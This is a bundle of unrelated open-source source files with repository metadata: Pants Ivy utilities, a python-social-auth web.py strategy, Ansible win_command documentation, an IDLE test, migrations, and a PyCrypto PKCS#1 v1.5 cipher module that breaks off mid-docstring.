'sqp.view': {
'Meta': {'ordering': "['order']", 'object_name': 'View'},
'expects': ('django.db.models.fields.CharField', [], {'default': "'tuple'", 'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '140'})
},
'sqp.widget': {
'Meta': {'object_name': 'Widget'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['sqp']
|
mit
|
sid-kap/pants
|
src/python/pants/backend/jvm/ivy_utils.py
|
4
|
19614
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import errno
import logging
import os
import pkgutil
import threading
import xml.etree.ElementTree as ET
from collections import OrderedDict, defaultdict, namedtuple
from contextlib import contextmanager
from copy import deepcopy
from twitter.common.collections import OrderedSet, maybe_list
from pants.backend.jvm.targets.exclude import Exclude
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.base.generator import Generator, TemplateData
from pants.base.revision import Revision
from pants.base.target import Target
from pants.ivy.ivy_subsystem import IvySubsystem
from pants.util.dirutil import safe_mkdir, safe_open
IvyModule = namedtuple('IvyModule', ['ref', 'artifact', 'callers'])
logger = logging.getLogger(__name__)
class IvyModuleRef(object):
def __init__(self, org, name, rev, classifier=None):
self.org = org
self.name = name
self.rev = rev
self.classifier = classifier
def __eq__(self, other):
return self.org == other.org and \
self.name == other.name and \
self.rev == other.rev and \
self.classifier == other.classifier
def __hash__(self):
return hash((self.org, self.name, self.rev, self.classifier))
def __str__(self):
    return 'IvyModuleRef({})'.format(
      ':'.join([self.org, self.name, self.rev, self.classifier or '']))
@property
def unversioned(self):
"""This returns an identifier for an IvyModuleRef without version information.
It's useful because ivy might return information about a
different version of a dependency than the one we request, and we
want to ensure that all requesters of any version of that
dependency are able to learn about it.
"""
# latest.integration is ivy magic meaning "just get the latest version"
return IvyModuleRef(name=self.name, org=self.org, rev='latest.integration', classifier=self.classifier)
@property
def unclassified(self):
"""This returns an identifier for an IvyModuleRef without classifier information."""
return IvyModuleRef(name=self.name, org=self.org, rev=self.rev, classifier=None)
class IvyInfo(object):
def __init__(self):
self.modules_by_ref = {} # Map from ref to referenced module.
# Map from ref of caller to refs of modules required by that caller.
self._deps_by_caller = defaultdict(OrderedSet)
# Map from _unversioned_ ref to OrderedSet of IvyArtifact instances.
self._artifacts_by_ref = defaultdict(OrderedSet)
def add_module(self, module):
self.modules_by_ref[module.ref] = module
if not module.artifact:
# Module was evicted, so do not record information about it
return
for caller in module.callers:
self._deps_by_caller[caller.unversioned].add(module.ref)
self._artifacts_by_ref[module.ref.unversioned].add(module.artifact)
def traverse_dependency_graph(self, ref, collector, memo=None, visited=None):
"""Traverses module graph, starting with ref, collecting values for each ref into the sets
created by the collector function.
    :param ref: an IvyModuleRef to start traversing the ivy dependency graph
    :param collector: a function that takes a ref and returns a new set of values to collect
      for that ref; the set is also updated with the values accumulated from its dependencies
    :param memo: a dict of ref -> set that memoizes the results of each node in the graph.
      If provided, allows the cache to be retained across calls.
    :returns: the accumulated set for ref
"""
if memo is None:
memo = dict()
memoized_value = memo.get(ref)
if memoized_value:
return memoized_value
visited = visited or set()
if ref in visited:
# Ivy allows for circular dependencies
# If we're here, that means we're resolving something that
# transitively depends on itself
return set()
visited.add(ref)
acc = collector(ref)
for dep in self._deps_by_caller.get(ref.unversioned, ()):
acc.update(self.traverse_dependency_graph(dep, collector, memo, visited))
memo[ref] = acc
return acc
def get_artifacts_for_jar_library(self, jar_library, memo=None):
"""Collects jars for the passed jar_library.
Because artifacts are only fetched for the "winning" version of a module, the artifacts
will not always represent the version originally declared by the library.
This method is transitive within the library's jar_dependencies, but will NOT
walk into its non-jar dependencies.
    :param jar_library: A JarLibrary to collect the transitive artifacts for.
    :param memo: see `traverse_dependency_graph`
:returns: all the artifacts for all of the jars in this library, including transitive deps
:rtype: list of str
"""
artifacts = OrderedSet()
def create_collection(dep):
return OrderedSet([dep])
for jar in jar_library.jar_dependencies:
for classifier in jar.artifact_classifiers:
jar_module_ref = IvyModuleRef(jar.org, jar.name, jar.rev, classifier)
for module_ref in self.traverse_dependency_graph(jar_module_ref, create_collection, memo):
artifacts.update(self._artifacts_by_ref[module_ref.unversioned])
return artifacts
def get_jars_for_ivy_module(self, jar, memo=None):
"""Collects dependency references of the passed jar
:param jar an JarDependency for a third party dependency.
:param memo see `traverse_dependency_graph`
"""
ref = IvyModuleRef(jar.org, jar.name, jar.rev, jar.classifier).unversioned
def create_collection(dep):
s = OrderedSet()
if ref != dep.unversioned:
s.add(dep)
return s
return self.traverse_dependency_graph(ref, create_collection, memo)
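# Illustrative sketch (not part of ivy_utils): the collector/memo traversal
# pattern used by IvyInfo.traverse_dependency_graph above, on a toy dependency
# graph. Each node contributes its own value and accumulates those of its
# transitive dependencies; 'memo' lets repeated lookups reuse earlier results
# and 'visited' tolerates cycles, as ivy does.
def _collect_transitive_demo(graph, node, collector, memo=None, visited=None):
  memo = {} if memo is None else memo
  if node in memo:
    return memo[node]
  visited = visited or set()
  if node in visited:
    return set()
  visited.add(node)
  acc = collector(node)
  for dep in graph.get(node, ()):
    acc.update(_collect_transitive_demo(graph, dep, collector, memo, visited))
  memo[node] = acc
  return acc
# 'a' depends on 'b' and 'c'; 'b' depends on 'c'.
_toy_graph = {'a': ['b', 'c'], 'b': ['c']}
assert _collect_transitive_demo(_toy_graph, 'a', lambda n: {n}) == {'a', 'b', 'c'}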
class IvyUtils(object):
"""Useful methods related to interaction with ivy."""
ivy_lock = threading.RLock()
IVY_TEMPLATE_PACKAGE_NAME = __name__
IVY_TEMPLATE_PATH = os.path.join('tasks', 'templates', 'ivy_resolve', 'ivy.mustache')
INTERNAL_ORG_NAME = 'internal'
class IvyResolveReportError(Exception):
"""Raised when the ivy report cannot be found."""
pass
@staticmethod
def _generate_exclude_template(exclude):
return TemplateData(org=exclude.org, name=exclude.name)
@staticmethod
def _generate_override_template(jar):
return TemplateData(org=jar.org, module=jar.module, version=jar.version)
@staticmethod
@contextmanager
def cachepath(path):
if not os.path.exists(path):
yield ()
else:
with safe_open(path, 'r') as cp:
yield (path.strip() for path in cp.read().split(os.pathsep) if path.strip())
@classmethod
def _find_new_symlinks(cls, existing_symlink_path, updated_symlink_path):
"""Find the difference between the existing and updated symlink path.
:param existing_symlink_path: map from path : symlink
:param updated_symlink_path: map from path : symlink after new resolve
:return: the portion of updated_symlink_path that is not found in existing_symlink_path.
"""
diff_map = OrderedDict()
for key, value in updated_symlink_path.iteritems():
if key not in existing_symlink_path:
diff_map[key] = value
return diff_map
@classmethod
def symlink_cachepath(cls, ivy_cache_dir, inpath, symlink_dir, outpath, existing_symlink_map):
"""Symlinks all paths listed in inpath that are under ivy_cache_dir into symlink_dir.
If there is an existing symlink for a file under inpath, it is used rather than creating
a new symlink. Preserves all other paths. Writes the resulting paths to outpath.
Returns a map of path -> symlink to that path.
"""
safe_mkdir(symlink_dir)
# The ivy_cache_dir might itself be a symlink. In this case, ivy may return paths that
# reference the realpath of the .jar file after it is resolved in the cache dir. To handle
# this case, add both the symlink'ed path and the realpath to the jar to the symlink map.
real_ivy_cache_dir = os.path.realpath(ivy_cache_dir)
updated_symlink_map = OrderedDict()
with safe_open(inpath, 'r') as infile:
inpaths = filter(None, infile.read().strip().split(os.pathsep))
paths = OrderedSet([os.path.realpath(path) for path in inpaths])
for path in paths:
if path.startswith(real_ivy_cache_dir):
updated_symlink_map[path] = os.path.join(symlink_dir, os.path.relpath(path, real_ivy_cache_dir))
else:
# This path is outside the cache. We won't symlink it.
updated_symlink_map[path] = path
# Create symlinks for paths in the ivy cache dir that we haven't seen before.
new_symlinks = cls._find_new_symlinks(existing_symlink_map, updated_symlink_map)
for path, symlink in new_symlinks.iteritems():
if path == symlink:
# Skip paths that aren't going to be symlinked.
continue
safe_mkdir(os.path.dirname(symlink))
try:
os.symlink(path, symlink)
except OSError as e:
# We don't delete and recreate the symlink, as this may break concurrently executing code.
if e.errno != errno.EEXIST:
raise
# (re)create the classpath with all of the paths
with safe_open(outpath, 'w') as outfile:
outfile.write(':'.join(OrderedSet(updated_symlink_map.values())))
return dict(updated_symlink_map)
@staticmethod
def identify(targets):
targets = list(targets)
if len(targets) == 1 and targets[0].is_jvm and getattr(targets[0], 'provides', None):
return targets[0].provides.org, targets[0].provides.name
else:
return IvyUtils.INTERNAL_ORG_NAME, Target.maybe_readable_identify(targets)
@classmethod
def xml_report_path(cls, resolve_hash_name, conf):
"""The path to the xml report ivy creates after a retrieve.
:param string resolve_hash_name: Hash from the Cache key from the VersionedTargetSet
used for resolution.
:param string conf: the ivy conf name (e.g. "default")
"""
cachedir = IvySubsystem.global_instance().get_options().cache_dir
return os.path.join(cachedir, '{}-{}-{}.xml'.format(IvyUtils.INTERNAL_ORG_NAME,
resolve_hash_name, conf))
@classmethod
def parse_xml_report(cls, resolve_hash_name, conf):
"""Parse the ivy xml report corresponding to the name passed to ivy.
:param string resolve_hash_name: Hash from the Cache key from the VersionedTargetSet
used for resolution.
:param string conf: the ivy conf name (e.g. "default")
:return: The info in the xml report or None if target is empty.
:rtype: IvyInfo
:raises: IvyResolveReportError if no report exists.
"""
if not resolve_hash_name:
return None
path = cls.xml_report_path(resolve_hash_name, conf)
if not os.path.exists(path):
raise cls.IvyResolveReportError('Missing expected ivy output file {}'.format(path))
return cls._parse_xml_report(path)
@classmethod
def _parse_xml_report(cls, path):
logger.debug("Parsing ivy report {}".format(path))
ret = IvyInfo()
etree = ET.parse(path)
doc = etree.getroot()
for module in doc.findall('dependencies/module'):
org = module.get('organisation')
name = module.get('name')
for revision in module.findall('revision'):
rev = revision.get('name')
callers = []
for caller in revision.findall('caller'):
callers.append(IvyModuleRef(caller.get('organisation'),
caller.get('name'),
caller.get('callerrev')))
for artifact in revision.findall('artifacts/artifact'):
ivy_module_ref = IvyModuleRef(org, name, rev, artifact.get('extra-classifier'))
ret.add_module(IvyModule(ivy_module_ref, artifact.get('location'), callers))
return ret
@classmethod
def _combine_jars(cls, jars):
"""Combine jars with the same org/name/version so they can be represented together in ivy.xml.
If you have multiple instances of a dependency with org/name/version with different
classifiers, they need to be represented with one <dependency> tag and multiple <artifact> tags.
:param jars: list of JarDependency definitions
:return: list of JarDependency definitions. These are cloned from the input jars so we
don't mutate the inputs.
"""
jar_map = OrderedDict()
for jar in jars:
key = (jar.org, jar.name, jar.rev)
if key not in jar_map:
jar_map[key] = deepcopy(jar)
else:
# Add an artifact
existing_jar = jar_map[key]
if not existing_jar.artifacts or not jar.artifacts:
# Add an artifact to represent the main artifact
existing_jar.append_artifact(jar.name,
type_=None,
ext=None,
url=None,
classifier=None)
existing_jar.artifacts += jar.artifacts
return jar_map.values()
@classmethod
def generate_ivy(cls, targets, jars, excludes, ivyxml, confs, resolve_hash_name=None):
if resolve_hash_name:
org = IvyUtils.INTERNAL_ORG_NAME
name = resolve_hash_name
else:
org, name = cls.identify(targets)
# As it turns out force is not transitive - it only works for dependencies pants knows about
# directly (declared in BUILD files - present in generated ivy.xml). The user-level ivy docs
# don't make this clear [1], but the source code docs do (see isForce docs) [2]. I was able to
# edit the generated ivy.xml and use the override feature [3] though and that does work
# transitively as you'd hope.
#
# [1] http://ant.apache.org/ivy/history/2.3.0/settings/conflict-managers.html
# [2] https://svn.apache.org/repos/asf/ant/ivy/core/branches/2.3.0/
# src/java/org/apache/ivy/core/module/descriptor/DependencyDescriptor.java
# [3] http://ant.apache.org/ivy/history/2.3.0/ivyfile/override.html
dependencies = [cls._generate_jar_template(jar, confs) for jar in jars]
overrides = [cls._generate_override_template(dep) for dep in dependencies if dep.force]
excludes = [cls._generate_exclude_template(exclude) for exclude in excludes]
template_data = TemplateData(
org=org,
module=name,
version='latest.integration',
publications=None,
configurations=maybe_list(confs), # Mustache doesn't like sets.
dependencies=dependencies,
excludes=excludes,
overrides=overrides)
safe_mkdir(os.path.dirname(ivyxml))
with open(ivyxml, 'w') as output:
generator = Generator(pkgutil.get_data(__name__, cls.IVY_TEMPLATE_PATH),
root_dir=get_buildroot(),
lib=template_data)
generator.write(output)
@classmethod
def calculate_classpath(cls, targets, gather_excludes=True):
jars = OrderedDict()
global_excludes = set()
provide_excludes = set()
targets_processed = set()
# Support the ivy force concept when we sanely can for internal dep conflicts.
# TODO(John Sirois): Consider supporting / implementing the configured ivy revision picking
# strategy generally.
def add_jar(jar):
coordinate = jar.coordinate_without_rev
existing = jars.get(coordinate)
jars[coordinate] = jar if not existing else (
cls._resolve_conflict(existing=existing, proposed=jar)
)
def collect_jars(target):
if not isinstance(target, JarLibrary):
return
# Combine together requests for jars with different classifiers from the same jar_library
# TODO(Eric Ayers) This is a short-term fix for dealing with the same ivy module that
# wants to download multiple jar files with different classifiers as binary dependencies.
# I am trying to work out a better long-term solution in this design doc:
# https://docs.google.com/document/d/1sEMXUmj7v-YCBZ_wHLpCFjkHOeWjsc1NR1hRIJ9uCZ8
for jar in cls._combine_jars(target.jar_dependencies):
if jar.rev:
add_jar(jar)
def collect_excludes(target):
target_excludes = target.payload.get_field_value('excludes')
if target_excludes:
global_excludes.update(target_excludes)
def collect_provide_excludes(target):
if not target.is_exported:
return
logger.debug('Automatically excluding jar {}.{}, which is provided by {}'.format(
target.provides.org, target.provides.name, target))
provide_excludes.add(Exclude(org=target.provides.org, name=target.provides.name))
def collect_elements(target):
targets_processed.add(target)
collect_jars(target)
if gather_excludes:
collect_excludes(target)
collect_provide_excludes(target)
for target in targets:
target.walk(collect_elements, predicate=lambda target: target not in targets_processed)
# If a source dep is exported (ie, has a provides clause), it should always override
# remote/binary versions of itself, ie "round trip" dependencies.
# TODO: Move back to applying provides excludes as target-level excludes when they are no
# longer global.
if provide_excludes:
additional_excludes = tuple(provide_excludes)
for coordinate, jar in jars.items():
jar.excludes += additional_excludes
return jars.values(), global_excludes
@staticmethod
def _resolve_conflict(existing, proposed):
if proposed == existing:
if proposed.force:
return proposed
return existing
elif existing.force and proposed.force:
raise TaskError('Cannot force {}#{};{} to both rev {} and {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev
))
elif existing.force:
logger.debug('Ignoring rev {} for {}#{};{} already forced to {}'.format(
proposed.rev, proposed.org, proposed.name, proposed.classifier or '', existing.rev
))
return existing
elif proposed.force:
logger.debug('Forcing {}#{};{} from {} to {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev
))
return proposed
else:
try:
if Revision.lenient(proposed.rev) > Revision.lenient(existing.rev):
logger.debug('Upgrading {}#{};{} from rev {} to {}'.format(
proposed.org, proposed.name, proposed.classifier or '', existing.rev, proposed.rev,
))
return proposed
else:
return existing
except Revision.BadRevision as e:
raise TaskError('Failed to parse jar revision', e)
@staticmethod
def _is_mutable(jar):
if jar.mutable is not None:
return jar.mutable
return False
@classmethod
def _generate_jar_template(cls, jar, confs):
template = TemplateData(
org=jar.org,
module=jar.name,
version=jar.rev,
mutable=cls._is_mutable(jar),
force=jar.force,
excludes=[cls._generate_exclude_template(exclude) for exclude in jar.excludes],
transitive=jar.transitive,
artifacts=jar.artifacts,
configurations=maybe_list(confs))
return template
|
apache-2.0
|
cneill/designate-testing
|
designate/storage/impl_sqlalchemy/migrate_repo/versions/058_placeholder.py
|
140
|
1035
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# This is a placeholder for Kilo backports.
# Do not use this number for new Liberty work. New Liberty work starts after
# all the placeholders.
#
# See https://blueprints.launchpad.net/nova/+spec/backportable-db-migrations
# http://lists.openstack.org/pipermail/openstack-dev/2013-March/006827.html
def upgrade(migrate_engine):
pass
def downgrade(migration_engine):
pass
|
apache-2.0
|
lawrence34/python-social-auth
|
social/strategies/webpy_strategy.py
|
77
|
1932
|
import web
from social.strategies.base import BaseStrategy, BaseTemplateStrategy
class WebpyTemplateStrategy(BaseTemplateStrategy):
def render_template(self, tpl, context):
return web.template.render(tpl)(**context)
def render_string(self, html, context):
return web.template.Template(html)(**context)
class WebpyStrategy(BaseStrategy):
DEFAULT_TEMPLATE_STRATEGY = WebpyTemplateStrategy
def get_setting(self, name):
return getattr(web.config, name)
def request_data(self, merge=True):
if merge:
data = web.input(_method='both')
elif web.ctx.method == 'POST':
data = web.input(_method='post')
else:
data = web.input(_method='get')
return data
def request_host(self):
return web.ctx.host
def redirect(self, url):
return web.seeother(url)
def html(self, content):
web.header('Content-Type', 'text/html;charset=UTF-8')
return content
def render_html(self, tpl=None, html=None, context=None):
if not tpl and not html:
raise ValueError('Missing template or html parameters')
context = context or {}
if tpl:
tpl = web.template.frender(tpl)
else:
tpl = web.template.Template(html)
return tpl(**context)
def session_get(self, name, default=None):
return web.web_session.get(name, default)
def session_set(self, name, value):
web.web_session[name] = value
def session_pop(self, name):
return web.web_session.pop(name, None)
def session_setdefault(self, name, value):
return web.web_session.setdefault(name, value)
def build_absolute_uri(self, path=None):
path = path or ''
if path.startswith('http://') or path.startswith('https://'):
return path
return web.ctx.protocol + '://' + web.ctx.host + path
|
bsd-3-clause
|
jhawkesworth/ansible
|
lib/ansible/modules/windows/win_command.py
|
40
|
3974
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2016, Ansible, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_command
short_description: Executes a command on a remote Windows node
version_added: 2.2
description:
- The C(win_command) module takes the command name followed by a list of space-delimited arguments.
- The given command will be executed on all selected nodes. It will not be
processed through the shell, so variables like C($env:HOME) and operations
like C("<"), C(">"), C("|"), and C(";") will not work (use the M(win_shell)
module if you need these features).
- For non-Windows targets, use the M(command) module instead.
options:
free_form:
description:
- The C(win_command) module takes a free form command to run.
- There is no parameter actually named 'free form'. See the examples!
type: str
required: yes
creates:
description:
- A path or path filter pattern; when the referenced path exists on the target host, the task will be skipped.
type: path
removes:
description:
- A path or path filter pattern; when the referenced path B(does not) exist on the target host, the task will be skipped.
type: path
chdir:
description:
- Set the specified path as the current working directory before executing a command.
type: path
stdin:
description:
- Set the stdin of the command directly to the specified value.
type: str
version_added: '2.5'
notes:
- If you want to run a command through a shell (say you are using C(<),
C(>), C(|), etc), you actually want the M(win_shell) module instead. The
C(win_command) module is much more secure as it's not affected by the user's
environment.
- C(creates), C(removes), and C(chdir) can be specified after the command. For instance, if you only want to run a command if a certain file does not
exist, use this.
seealso:
- module: command
- module: psexec
- module: raw
- module: win_psexec
- module: win_shell
author:
- Matt Davis (@nitzmahone)
'''
EXAMPLES = r'''
- name: Save the result of 'whoami' in 'whoami_out'
win_command: whoami
register: whoami_out
- name: Run command that only runs if folder exists and runs from a specific folder
win_command: wbadmin -backupTarget:C:\backup\
args:
chdir: C:\somedir\
creates: C:\backup\
- name: Run an executable and send data to the stdin for the executable
win_command: powershell.exe -
args:
stdin: Write-Host test
'''
RETURN = r'''
msg:
description: changed
returned: always
type: bool
sample: true
start:
description: The command execution start time
returned: always
type: str
sample: '2016-02-25 09:18:26.429568'
end:
description: The command execution end time
returned: always
type: str
sample: '2016-02-25 09:18:26.755339'
delta:
description: The command execution delta time
returned: always
type: str
sample: '0:00:00.325771'
stdout:
description: The command standard output
returned: always
type: str
sample: 'Clustering node rabbit@slave1 with rabbit@master ...'
stderr:
description: The command standard error
returned: always
type: str
sample: 'ls: cannot access foo: No such file or directory'
cmd:
description: The command executed by the task
returned: always
type: str
sample: 'rabbitmqctl join_cluster rabbit@master'
rc:
description: The command return code (0 means success)
returned: always
type: int
sample: 0
stdout_lines:
description: The command standard output split in lines
returned: always
type: list
sample: [u'Clustering node rabbit@slave1 with rabbit@master ...']
'''
|
gpl-3.0
|
maohongyuan/kbengine
|
kbe/src/lib/python/Lib/idlelib/idle_test/test_textview.py
|
79
|
2871
|
'''Test the functions and main class method of textView.py.
Since all methods and functions create (or destroy) a TextViewer, which
is a widget containing multiple widgets, all tests must be gui tests.
Using mock Text would not change this. Other mocks are used to retrieve
information about calls.
The coverage is essentially 100%.
'''
from test.support import requires
requires('gui')
import unittest
import os
from tkinter import Tk
from idlelib import textView as tv
from idlelib.idle_test.mock_idle import Func
from idlelib.idle_test.mock_tk import Mbox
def setUpModule():
global root
root = Tk()
def tearDownModule():
global root
root.destroy() # pyflakes falsely sees root as undefined
del root
class TV(tv.TextViewer): # used by TextViewTest
transient = Func()
grab_set = Func()
wait_window = Func()
class TextViewTest(unittest.TestCase):
def setUp(self):
TV.transient.__init__()
TV.grab_set.__init__()
TV.wait_window.__init__()
def test_init_modal(self):
view = TV(root, 'Title', 'test text')
self.assertTrue(TV.transient.called)
self.assertTrue(TV.grab_set.called)
self.assertTrue(TV.wait_window.called)
view.Ok()
def test_init_nonmodal(self):
view = TV(root, 'Title', 'test text', modal=False)
self.assertFalse(TV.transient.called)
self.assertFalse(TV.grab_set.called)
self.assertFalse(TV.wait_window.called)
view.Ok()
def test_ok(self):
view = TV(root, 'Title', 'test text', modal=False)
view.destroy = Func()
view.Ok()
self.assertTrue(view.destroy.called)
del view.destroy # unmask real function
view.destroy
class textviewTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.orig_mbox = tv.tkMessageBox
tv.tkMessageBox = Mbox
@classmethod
def tearDownClass(cls):
tv.tkMessageBox = cls.orig_mbox
del cls.orig_mbox
def test_view_text(self):
# If modal True, tkinter will error with 'can't invoke "event" command'
view = tv.view_text(root, 'Title', 'test text', modal=False)
self.assertIsInstance(view, tv.TextViewer)
def test_view_file(self):
test_dir = os.path.dirname(__file__)
testfile = os.path.join(test_dir, 'test_textview.py')
view = tv.view_file(root, 'Title', testfile, modal=False)
self.assertIsInstance(view, tv.TextViewer)
self.assertIn('Test', view.textView.get('1.0', '1.end'))
view.Ok()
# Mock messagebox will be used and view_file will not return anything
testfile = os.path.join(test_dir, '../notthere.py')
view = tv.view_file(root, 'Title', testfile, modal=False)
self.assertIsNone(view)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
lgpl-3.0
|
ardi69/pyload-0.4.10
|
lib/Python/Lib/Crypto/Cipher/PKCS1_v1_5.py
|
123
|
9103
|
# -*- coding: utf-8 -*-
#
# Cipher/PKCS1-v1_5.py : PKCS#1 v1.5
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""RSA encryption protocol according to PKCS#1 v1.5
See RFC3447__ or the `original RSA Labs specification`__ .
This scheme is more properly called ``RSAES-PKCS1-v1_5``.
**If you are designing a new protocol, consider using the more robust PKCS#1 OAEP.**
As an example, a sender may encrypt a message in this way:
>>> from Crypto.Cipher import PKCS1_v1_5
>>> from Crypto.PublicKey import RSA
>>> from Crypto.Hash import SHA
>>>
>>> message = 'To be encrypted'
>>> h = SHA.new(message)
>>>
>>> key = RSA.importKey(open('pubkey.der').read())
>>> cipher = PKCS1_v1_5.new(key)
>>> ciphertext = cipher.encrypt(message+h.digest())
At the receiver side, decryption can be done using the private part of
the RSA key:
>>> from Crypto.Hash import SHA
>>> from Crypto import Random
>>>
>>> key = RSA.importKey(open('privkey.der').read())
>>>
>>> dsize = SHA.digest_size
>>> sentinel = Random.new().read(15+dsize) # Let's assume that average data length is 15
>>>
>>> cipher = PKCS1_v1_5.new(key)
>>> message = cipher.decrypt(ciphertext, sentinel)
>>>
>>> digest = SHA.new(message[:-dsize]).digest()
>>> if digest==message[-dsize:]: # Note how we DO NOT look for the sentinel
>>> print "Encryption was correct."
>>> else:
>>> print "Encryption was not correct."
:undocumented: __revision__, __package__
.. __: http://www.ietf.org/rfc/rfc3447.txt
.. __: http://www.rsa.com/rsalabs/node.asp?id=2125.
"""
__revision__ = "$Id$"
__all__ = [ 'new', 'PKCS115_Cipher' ]
from Crypto.Util.number import ceil_div
from Crypto.Util.py3compat import *
import Crypto.Util.number
class PKCS115_Cipher:
"""This cipher can perform PKCS#1 v1.5 RSA encryption or decryption."""
def __init__(self, key):
"""Initialize this PKCS#1 v1.5 cipher object.
:Parameters:
key : an RSA key object
If a private half is given, both encryption and decryption are possible.
If a public half is given, only encryption is possible.
"""
self._key = key
def can_encrypt(self):
"""Return True if this cipher object can be used for encryption."""
return self._key.can_encrypt()
def can_decrypt(self):
"""Return True if this cipher object can be used for decryption."""
return self._key.can_decrypt()
def encrypt(self, message):
"""Produce the PKCS#1 v1.5 encryption of a message.
This function is named ``RSAES-PKCS1-V1_5-ENCRYPT``, and is specified in
section 7.2.1 of RFC3447.
For a complete example see `Crypto.Cipher.PKCS1_v1_5`.
:Parameters:
message : byte string
The message to encrypt, also known as plaintext. It can be of
variable length, but not longer than the RSA modulus (in bytes) minus 11.
:Return: A byte string, the ciphertext in which the message is encrypted.
It is as long as the RSA modulus (in bytes).
:Raise ValueError:
If the RSA key length is not sufficiently long to deal with the given
message.
"""
# TODO: Verify the key is RSA
randFunc = self._key._randfunc
# See 7.2.1 in RFC3447
modBits = Crypto.Util.number.size(self._key.n)
k = ceil_div(modBits,8) # Convert from bits to bytes
mLen = len(message)
# Step 1
if mLen > k-11:
raise ValueError("Plaintext is too long.")
# Step 2a
class nonZeroRandByte:
def __init__(self, rf): self.rf=rf
def __call__(self, c):
while bord(c)==0x00: c=self.rf(1)[0]
return c
ps = tobytes(map(nonZeroRandByte(randFunc), randFunc(k-mLen-3)))
# Step 2b
em = b('\x00\x02') + ps + bchr(0x00) + message
# Step 3a (OS2IP), step 3b (RSAEP), part of step 3c (I2OSP)
m = self._key.encrypt(em, 0)[0]
# Complete step 3c (I2OSP)
c = bchr(0x00)*(k-len(m)) + m
return c
def decrypt(self, ct, sentinel):
"""Decrypt a PKCS#1 v1.5 ciphertext.
This function is named ``RSAES-PKCS1-V1_5-DECRYPT``, and is specified in
section 7.2.2 of RFC3447.
For a complete example see `Crypto.Cipher.PKCS1_v1_5`.
:Parameters:
ct : byte string
The ciphertext that contains the message to recover.
sentinel : any type
The object to return to indicate that an error was detected during decryption.
:Return: A byte string. It is either the original message or the ``sentinel`` (in case of an error).
:Raise ValueError:
If the ciphertext length is incorrect
:Raise TypeError:
If the RSA key has no private half.
:attention:
You should **never** let the party who submitted the ciphertext know that
this function returned the ``sentinel`` value.
            Armed with such knowledge (gathered from a fair number of carefully crafted but invalid ciphertexts),
            an attacker is able to reconstruct the plaintext of any other encryption that was carried out
            with the same RSA public key (see `Bleichenbacher's`__ attack).
In general, it should not be possible for the other party to distinguish
whether processing at the server side failed because the value returned
was a ``sentinel`` as opposed to a random, invalid message.
In fact, the second option is not that unlikely: encryption done according to PKCS#1 v1.5
embeds no good integrity check. There is roughly one chance
in 2^16 for a random ciphertext to be returned as a valid message
(although random looking).
            It is therefore advisable to:
            1. Select as ``sentinel`` a value that resembles a plausible random, invalid message.
2. Not report back an error as soon as you detect a ``sentinel`` value.
Put differently, you should not explicitly check if the returned value is the ``sentinel`` or not.
3. Cover all possible errors with a single, generic error indicator.
4. Embed into the definition of ``message`` (at the protocol level) a digest (e.g. ``SHA-1``).
            It is recommended for it to be the rightmost part of ``message``.
            5. Where possible, monitor the number of errors due to ciphertexts originating from the same party,
            and slow down the rate of requests from that party (or even blacklist it altogether).
**If you are designing a new protocol, consider using the more robust PKCS#1 OAEP.**
.. __: http://www.bell-labs.com/user/bleichen/papers/pkcs.ps
"""
# TODO: Verify the key is RSA
# See 7.2.1 in RFC3447
modBits = Crypto.Util.number.size(self._key.n)
k = ceil_div(modBits,8) # Convert from bits to bytes
# Step 1
if len(ct) != k:
raise ValueError("Ciphertext with incorrect length.")
# Step 2a (O2SIP), 2b (RSADP), and part of 2c (I2OSP)
m = self._key.decrypt(ct)
# Complete step 2c (I2OSP)
em = bchr(0x00)*(k-len(m)) + m
# Step 3
sep = em.find(bchr(0x00),2)
if not em.startswith(b('\x00\x02')) or sep<10:
return sentinel
# Step 4
return em[sep+1:]
def new(key):
"""Return a cipher object `PKCS115_Cipher` that can be used to perform PKCS#1 v1.5 encryption or decryption.
:Parameters:
key : RSA key object
